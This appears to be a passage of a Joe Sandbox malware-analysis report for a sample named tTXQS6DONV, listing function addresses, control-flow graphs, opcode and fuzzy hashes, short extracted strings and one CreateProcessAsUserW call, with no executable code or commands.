                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38021f97a248d1c7128bb1b046a36b8536904563b16c855f7826b537d06261f3
                                • Instruction ID: 9386eebbfa54a974129f43dfa30bd2a61a93704faa33ebf6902f4734b8d069a7
                                • Opcode Fuzzy Hash: 38021f97a248d1c7128bb1b046a36b8536904563b16c855f7826b537d06261f3
                                • Instruction Fuzzy Hash: 03B32670A166198BDB28FF79E99966CBBF2BB89301F4045E9D089A7350DF305D84CF81
                                Function 055A4A58 Relevance: 5.2, Instructions: 5237COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3057 55a4a58-55aa214 4010 55aa216 call 55abdb8 3057->4010 4011 55aa216 call 55abda9 3057->4011 4009 55aa21c-55aa223 4010->4009 4011->4009
                                Memory Dump Source
                                • Source File: 00000001.00000002.2893918898.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_55a0000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c9de5b9256473806cba7fab5bc68ed1bb5a9df48821dfd8d2bf00247d106fec
                                • Instruction ID: 9628aca3457da9e436538bbecd111b86ba19cccb15b96103d5d1b01a43bfa08c
                                • Opcode Fuzzy Hash: 7c9de5b9256473806cba7fab5bc68ed1bb5a9df48821dfd8d2bf00247d106fec
                                • Instruction Fuzzy Hash: 8CB3F770A1521A8FDB58FF78D99966CBBF2BB88200F4085EAD488A7354DF305D94DF81
                                Function 07B9C1D8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4012 7b9c1d8-7b9c1fd 4013 7b9c1ff 4012->4013 4014 7b9c204-7b9c228 4012->4014 4013->4014 4015 7b9c229 4014->4015 4016 7b9c230-7b9c24c 4015->4016 4017 7b9c24e 4016->4017 4018 7b9c255-7b9c256 4016->4018 4017->4015 4017->4018 4019 7b9c41b-7b9c44e call 7b95b68 4017->4019 4020 7b9c25b-7b9c27f 4017->4020 4021 7b9c47b-7b9c484 4017->4021 4022 7b9c3d0-7b9c3e8 4017->4022 4023 7b9c332-7b9c345 4017->4023 4024 7b9c456-7b9c468 4017->4024 4025 7b9c2a8-7b9c2b0 4017->4025 4026 7b9c34a-7b9c37d call 7b9a518 4017->4026 4027 7b9c46d-7b9c476 4017->4027 4028 7b9c3ae-7b9c3b1 4017->4028 4029 7b9c2ee-7b9c306 4017->4029 4030 7b9c281-7b9c292 4017->4030 4031 7b9c385-7b9c388 call 7b9c4e0 4017->4031 4018->4021 4019->4024 4020->4016 4045 7b9c3fb-7b9c402 4022->4045 4046 7b9c3ea-7b9c3f9 4022->4046 4023->4016 4024->4016 4032 7b9c2b7-7b9c2c2 4025->4032 4026->4031 4027->4016 4037 7b9c3ba-7b9c3cb 4028->4037 4050 7b9c319-7b9c320 4029->4050 4051 7b9c308-7b9c317 4029->4051 4047 7b9c2b2-7b9c2b4 4030->4047 4048 7b9c294-7b9c2a6 4030->4048 4035 7b9c38e-7b9c3a9 4031->4035 4042 7b9c2d5-7b9c2dc 4032->4042 4043 7b9c2c4-7b9c2d3 4032->4043 4035->4016 4037->4016 4049 7b9c2e3-7b9c2e9 4042->4049 4043->4049 4054 7b9c409-7b9c416 4045->4054 4046->4054 4047->4032 4048->4016 4049->4016 4053 7b9c327-7b9c32d 4050->4053 4051->4053 4053->4016 4054->4016
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 0961bbd8ef52d7e9fe7755537e4f34796a8970b9f7649bfcb9f408c588ec7dfd
                                • Instruction ID: c944699d5308b774fee1623775763b29ca8713f4dba9b0a18ca0d928a27ca36b
                                • Opcode Fuzzy Hash: 0961bbd8ef52d7e9fe7755537e4f34796a8970b9f7649bfcb9f408c588ec7dfd
                                • Instruction Fuzzy Hash: A581E0B0D152198FDF14CFE5D9846EEFBB2AB89300F60946AD426BB254DB345A02CF64
                                Function 0742401E Relevance: 4.1, Strings: 1, Instructions: 2832COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4059 742401e-74240cc call 742407c 4064 74240d2-74241cc 4059->4064 4065 74241d4-74241d6 4059->4065 4064->4065 4066 74241d8-74241db 4065->4066 4067 74241dd-74241ed 4065->4067 4069 742421b-742565a 4066->4069 4073 7424202-7424218 4067->4073 4074 74241ef-7424200 4067->4074 4330 7425660-74256e8 4069->4330 4331 742730b 4069->4331 4073->4069 4074->4069 4649 74256ee call 74282a0 4330->4649 4650 74256ee call 74282b0 4330->4650 4651 74256ee call 74282ac 4330->4651 4331->4331 4339 74256f1-74258e4 4363 74258ea-74259d9 4339->4363 4364 74259de-7425acc 4339->4364 4385 7425acf-7426f9f 4363->4385 4364->4385 4649->4339 4650->4339 4651->4339
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: G
                                • API String ID: 0-985283518
                                • Opcode ID: 87069dc0bc1db4c1b0ee317a65d4419df96fb20f11515f2214392d693b8b5d5f
                                • Instruction ID: 7da6461a8472bc62c3a6b403835f1b91aba24fc88f8bed32effe2f31cd02f9a6
                                • Opcode Fuzzy Hash: 87069dc0bc1db4c1b0ee317a65d4419df96fb20f11515f2214392d693b8b5d5f
                                • Instruction Fuzzy Hash: 85437C70A156598BCB64FF78E88966DBBB2FF88300F8044E9E948A7340DE346D94CF55
                                Function 07424080 Relevance: 2.9, Instructions: 2865COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4715 7424080-74240cc 4718 74240d2-74241cc 4715->4718 4719 74241d4-74241d6 4715->4719 4718->4719 4720 74241d8-74241db 4719->4720 4721 74241dd-74241ed 4719->4721 4723 742421b-742565a 4720->4723 4727 7424202-7424218 4721->4727 4728 74241ef-7424200 4721->4728 4984 7425660-74256e8 4723->4984 4985 742730b 4723->4985 4727->4723 4728->4723 5303 74256ee call 74282a0 4984->5303 5304 74256ee call 74282b0 4984->5304 5305 74256ee call 74282ac 4984->5305 4985->4985 4993 74256f1-74258e4 5017 74258ea-74259d9 4993->5017 5018 74259de-7425acc 4993->5018 5039 7425acf-7426f9f 5017->5039 5018->5039 5303->4993 5304->4993 5305->4993
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c633a62e4fc3a39026a6ff2fb7fbdc53f2751569b8c56663d9056dc1483f7a07
                                • Instruction ID: 7f80dc4307a905a37a5d5eff758779737243bf8fe8ba39c257a0b2088e5739e0
                                • Opcode Fuzzy Hash: c633a62e4fc3a39026a6ff2fb7fbdc53f2751569b8c56663d9056dc1483f7a07
                                • Instruction Fuzzy Hash: FA436C70A156598BCB68FF78E88966DBBB2FF88300F8044E9D948A7340DE346D94CF55
                                Function 07B94B50 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5898 7b94b50-7b94b6a 5899 7b94b6c 5898->5899 5900 7b94b71-7b94c1c 5898->5900 5899->5900 5910 7b94c1f 5900->5910 5911 7b94c26-7b94c42 5910->5911 5912 7b94c4b-7b94c4c 5911->5912 5913 7b94c44 5911->5913 5914 7b94dbb-7b94dc1 5912->5914 5913->5910 5913->5912 5913->5914 5915 7b94c6d-7b94cad 5913->5915 5916 7b94c51-7b94c6b 5913->5916 5917 7b94d30-7b94d6f 5913->5917 5918 7b94d84-7b94d88 5913->5918 5927 7b94cb8-7b94cfd 5915->5927 5916->5911 5938 7b94d71 call 7b9633c 5917->5938 5939 7b94d71 call 7b96330 5917->5939 5940 7b94d71 call 7b96340 5917->5940 5919 7b94d9b-7b94da2 5918->5919 5920 7b94d8a-7b94d99 5918->5920 5922 7b94da9-7b94db6 5919->5922 5920->5922 5922->5911 5935 7b94cff-7b94d0e 5927->5935 5936 7b94d10-7b94d17 5927->5936 5932 7b94d77-7b94d7f 5932->5911 5937 7b94d1e-7b94d2b 5935->5937 5936->5937 5937->5911 5938->5932 5939->5932 5940->5932
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f
                                • API String ID: 0-3590766845
                                • Opcode ID: fee1ac10eab72ca02075a5737c0b917fc9e95d6cee843e65321dcda566c08563
                                • Instruction ID: 234861ebba62d4a5cb01e7a3de257160035180dae76f511348a94827b3cac492
                                • Opcode Fuzzy Hash: fee1ac10eab72ca02075a5737c0b917fc9e95d6cee843e65321dcda566c08563
                                • Instruction Fuzzy Hash: 55711FB8E10208DFDB44DFA5D5956AEBBB2FF89300F20846AE41ABB354DB304946CF51
                                Function 07B9BC58 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5980 7b9bc58-7b9bce3 5982 7b9bcee-7b9bcf5 5980->5982 5983 7b9bce5-7b9bceb 5980->5983 5984 7b9bd00-7b9bd18 5982->5984 5985 7b9bcf7-7b9bcfd 5982->5985 5983->5982 5986 7b9bd29-7b9bdd6 CreateProcessAsUserW 5984->5986 5987 7b9bd1a-7b9bd26 5984->5987 5985->5984 5989 7b9bdd8-7b9bdde 5986->5989 5990 7b9bddf-7b9be5e 5986->5990 5987->5986 5989->5990 5997 7b9be70-7b9be77 5990->5997 5998 7b9be60-7b9be66 5990->5998 5999 7b9be79-7b9be88 5997->5999 6000 7b9be8e 5997->6000 5998->5997 5999->6000
                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07B9BDC3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: 1f83275c005dc0b9c4895a3a851d3d8556bbf418285f561662e93c7936974d3d
                                • Instruction ID: 4b27d0e1917300294a4c11d4048652913660ff9ee28ada0866d678a6a55eef52
                                • Opcode Fuzzy Hash: 1f83275c005dc0b9c4895a3a851d3d8556bbf418285f561662e93c7936974d3d
                                • Instruction Fuzzy Hash: FF51E5B190022ADFDF24CF59D840BDEBBB5BF48710F0484AAE918B7254DB719A85CF90
                                Function 0742EFF8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: e4b16f167653eced51efb33e94ce897855d8144d94c6797dd7dcc8d4208d01f3
                                • Instruction ID: 5ca9988d6c35f354a203262ed42e77c56ae13d22a72d1d47a600648faa7a0f14
                                • Opcode Fuzzy Hash: e4b16f167653eced51efb33e94ce897855d8144d94c6797dd7dcc8d4208d01f3
                                • Instruction Fuzzy Hash: D3C145B4D1421ADFCB04CFA9C5809AEFBB2FF8A300F90995AD415AB214C734A947DF90
                                Function 07B94B40 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f
                                • API String ID: 0-3135077484
                                • Opcode ID: cea444127ef5244537d852900fba6973813f48abcfafaf28c26394295add3735
                                • Instruction ID: 88bf2fb02eb3ce7edb0325c943143ed23ae80305bdb29b6e48acfd0a1e7ff479
                                • Opcode Fuzzy Hash: cea444127ef5244537d852900fba6973813f48abcfafaf28c26394295add3735
                                • Instruction Fuzzy Hash: EB71F0B8E10208DFDB48DFA5D4956AEBBB2FF89300F20946AE41AB7354DB305946CF50
                                Function 07B94B4C Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f
                                • API String ID: 0-3135077484
                                • Opcode ID: 77c5797be9bfa8c3e1c63e490daf8e9b6682ebb1bf8588bc519394f2d467a757
                                • Instruction ID: f5ff1a4d099567a5163982e17d47bb1d93d7e914725d8dd9a194695805d57057
                                • Opcode Fuzzy Hash: 77c5797be9bfa8c3e1c63e490daf8e9b6682ebb1bf8588bc519394f2d467a757
                                • Instruction Fuzzy Hash: 2271FFB8E10208DFDB48DFA5D5956AEBBB2FF89300F20946AE41AB7354DB305946CF50
                                Function 0742D780 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: 0ef40e431e5ecb25cc84a71ef501d08d4e0b222b283563773e54c52bb2d9b153
                                • Instruction ID: 24d748446eea35dab861f3bffc5d5e81fb568de1312f28d1636024ac61e63a29
                                • Opcode Fuzzy Hash: 0ef40e431e5ecb25cc84a71ef501d08d4e0b222b283563773e54c52bb2d9b153
                                • Instruction Fuzzy Hash: CC516DB1E1421A8FDB08CFA9C8406EEFBF2FF89201F64D56AD429A7250D7344942DF94
                                Function 0742D790 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: 7b4a0dbed3c989ef8be58cdb54024a42000557a2f640be653c42cf0bd962714a
                                • Instruction ID: 0c079dba8473afe84f5d1c5ac45282d9ced6b96bf658a5a88e8a9dece045db16
                                • Opcode Fuzzy Hash: 7b4a0dbed3c989ef8be58cdb54024a42000557a2f640be653c42cf0bd962714a
                                • Instruction Fuzzy Hash: D65147B0E142198FDB08CFA9C8406EEFBF2BF89201F64D42AD419B7254D7348942DFA4
                                Function 07428DB8 Relevance: 1.4, Instructions: 1392COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6dee7e875c4971d3986610cb12ee68ed7b633dbf6f6cda102ec72e6c351e64c
                                • Instruction ID: 9987af163d68a8d62acac2266336dc56f95f9c9bbc241b8da484ebc19bfef1d0
                                • Opcode Fuzzy Hash: f6dee7e875c4971d3986610cb12ee68ed7b633dbf6f6cda102ec72e6c351e64c
                                • Instruction Fuzzy Hash: F1C28070B152198BC724FF78E8997ADB7B2BF88300F8185A9E848A7344DF349D95CB51
                                Function 0742AE60 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: fbd2910a8674e92b6104408661ad9b3d92a94ae146faf58b91623f31caa71764
                                • Instruction ID: 31a384e8cbaaaece91fdd0d2825db908fb169ed24d9dc5c2ffec36f7fbf30470
                                • Opcode Fuzzy Hash: fbd2910a8674e92b6104408661ad9b3d92a94ae146faf58b91623f31caa71764
                                • Instruction Fuzzy Hash: B45154B5E01658CFDB58CFAAC9446DDBBF2AFC9301F14C4AA9409AB364DB345A85CF40
                                Function 0742AE52 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 7b228f361169d2d9e3eaaf3255ab3bcb25fdbd8ab799c9b8afe82c2934781dca
                                • Instruction ID: 6b74b5594ed1246ec4fc2e3f62e2600b4ad88d6f9456ce7a55871c1aa16bd18e
                                • Opcode Fuzzy Hash: 7b228f361169d2d9e3eaaf3255ab3bcb25fdbd8ab799c9b8afe82c2934781dca
                                • Instruction Fuzzy Hash: 3A5157B1E01658CFDB58DFAAC9446DDBBF2AFC9300F54C4AA9409AB264DB345A85CF40
                                Function 0742AE5C Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 47fd5c6b50fb1b33b8e80eb902516e2e9bfeb26f0ff771ef2c039cb34cfdd81a
                                • Instruction ID: 3122369a058f704bdab2741c7135c35e336b1b4db5ee2f5c2e9f0e10afc0d515
                                • Opcode Fuzzy Hash: 47fd5c6b50fb1b33b8e80eb902516e2e9bfeb26f0ff771ef2c039cb34cfdd81a
                                • Instruction Fuzzy Hash: 255163B1E01658CFDB58CFAAC9446DDBBF2AFC9300F14C4AA9409AB364DB345A85CF40
                                Function 07B96DC0 Relevance: .3, Instructions: 319COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 107889aedb62ccce4a162026c523b654c9a3b8266ac13daaafd657ba6a19e92e
                                • Instruction ID: 7bf9318a57ab6a3244610b789769ce82ffda6b06754ba1c04c729d4ffacb0ec6
                                • Opcode Fuzzy Hash: 107889aedb62ccce4a162026c523b654c9a3b8266ac13daaafd657ba6a19e92e
                                • Instruction Fuzzy Hash: 85E13770A1166A8FDB24CF65C98479DFBB6FF89300F1495EAD40DBB214DB719A818F00
                                Function 07B96DB0 Relevance: .3, Instructions: 280COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41d5d5ad93d044841b5b7366636ed72a9aa95000be150da17f3e59eb4d62c57c
                                • Instruction ID: 02702a13a8dbd48f11a296474e73e7864f89203fc94ef932a642ca221c173dc2
                                • Opcode Fuzzy Hash: 41d5d5ad93d044841b5b7366636ed72a9aa95000be150da17f3e59eb4d62c57c
                                • Instruction Fuzzy Hash: A1D12570A1166A8FDB64CF69C94479DFBF6BF88300F1495EAD40DAB254DB71AA818F00
                                Function 07B9C4E0 Relevance: .2, Instructions: 232COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8206956070243b18b3ac7a0b74cc604f0abfb74b33eb7ae98a9fecd37c59d74a
                                • Instruction ID: 09f98630bf6a6ae0674264574ea4d6bec1d60f165bab146791595e64bfc6dfe6
                                • Opcode Fuzzy Hash: 8206956070243b18b3ac7a0b74cc604f0abfb74b33eb7ae98a9fecd37c59d74a
                                • Instruction Fuzzy Hash: 30A106B4E25208DFDF04CFA9D5856ADBFB2FB89300F20906AD426BB254DB349901CF25
                                Function 0742CECF Relevance: .2, Instructions: 229COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04af83de1db8a5f8d56f193624841d74421298f4f9b4d86f262045f594a9e545
                                • Instruction ID: 80dfb08112db7538d7c6e53cebf02b96e37db88afc41f89e27b765a17bd8c0eb
                                • Opcode Fuzzy Hash: 04af83de1db8a5f8d56f193624841d74421298f4f9b4d86f262045f594a9e545
                                • Instruction Fuzzy Hash: DD91F4B5E142198FDB04CFA9C890AEEFBB2FF89310F24942AD415BB355D73499468F60
                                Function 0742CF08 Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f7a396b4ffbbdbcb0874c70a59ce4d29afbad793a4ca2df4527f1daa185dec76
                                • Instruction ID: e1939582a43ae39701e00597924f22cb1e054d8b2bc382aec06845a38ae043db
                                • Opcode Fuzzy Hash: f7a396b4ffbbdbcb0874c70a59ce4d29afbad793a4ca2df4527f1daa185dec76
                                • Instruction Fuzzy Hash: E391B2B4E142198FDB04CFAAC594AEEFBB2FF89300F24942AD415BB354D73499468F54
                                Function 07B96568 Relevance: .2, Instructions: 159COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42f675dc45511a647a8190020bb5fafa03b2045c563a28fa6ba0bde9e5c08d6
                                • Instruction ID: ed2daa8d166597d1008d1b52d0732083da5af8dcebb9475eda783bae273ab603
                                • Opcode Fuzzy Hash: b42f675dc45511a647a8190020bb5fafa03b2045c563a28fa6ba0bde9e5c08d6
                                • Instruction Fuzzy Hash: F16112B0E10219EFEF04CFA5D944AAEBBB1FB49304F10987AD422B7254DB789A05DF51
                                Function 07B96558 Relevance: .2, Instructions: 152COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0932dca2626a57c54650de2ffeca10e2fdb6dfd97f2ddfad7db71ffd0b1d8b18
                                • Instruction ID: 7a9320196a410c9bb3568c7d21c44f7d845946aa52f0ed6314889acdefe4660d
                                • Opcode Fuzzy Hash: 0932dca2626a57c54650de2ffeca10e2fdb6dfd97f2ddfad7db71ffd0b1d8b18
                                • Instruction Fuzzy Hash: 9C6135B0E10219EFDB18CFA5C9446AEBBB2FB49304F10987AD422A7254DB389A05DF51
                                Function 0742E158 Relevance: .1, Instructions: 119COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71c57f6691be40a6e3fbe347db9155ad5ff52840013adf17c8abec52abb23cf1
                                • Instruction ID: 1877963153173aaf2564f045b0fe60c92f4e553cbb42e974e8ad6120c4a83d07
                                • Opcode Fuzzy Hash: 71c57f6691be40a6e3fbe347db9155ad5ff52840013adf17c8abec52abb23cf1
                                • Instruction Fuzzy Hash: 8E5108B0D11228CFDB18CFA6C9846DEBBB2BF89310F5084AAD4096B354DB345A96DF50
                                Function 0742E148 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1b1a0b20a773669fdfa4773f7c03ffca4724e59e77313bd0985d443a67e2b61
                                • Instruction ID: ed829c276c22c93a43d111aa38f764b6de57a099ba7783e32cf246ee7c842d2a
                                • Opcode Fuzzy Hash: c1b1a0b20a773669fdfa4773f7c03ffca4724e59e77313bd0985d443a67e2b61
                                • Instruction Fuzzy Hash: 0A411AB0D102288BDB18CFA6C9846DEBBF2BF88310F54C4AAD40977354DB745A96DF50
                                Function 0742E154 Relevance: .1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3010ae41e98b004358b5b43a650207420f80ccc4e8299337371470d0c166d5ae
                                • Instruction ID: d4f7382e239d5195c176c2f888f5c5f3a46b4148aec3f4f65694935501a1388d
                                • Opcode Fuzzy Hash: 3010ae41e98b004358b5b43a650207420f80ccc4e8299337371470d0c166d5ae
                                • Instruction Fuzzy Hash: 454119B0D106288BDB18CFA6C984ADEFBF2BF88310F54C4AAD40967354DB345A96CF50
                                Function 07B9AB58 Relevance: .1, Instructions: 97COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8499f8ab74490f26a8e0f5d86b673d3b84342a882b929d698aafc413ae457b4e
                                • Instruction ID: 59c7c9f51c8fc7fd9b3459e2ada227d74bc5ca6cec70ae629d2f1bce7e9760f3
                                • Opcode Fuzzy Hash: 8499f8ab74490f26a8e0f5d86b673d3b84342a882b929d698aafc413ae457b4e
                                • Instruction Fuzzy Hash: 3641C5B5E146188BEB18CFAAD9446DEBBF3BF89310F14C0BAD458A7214EB305985CF50
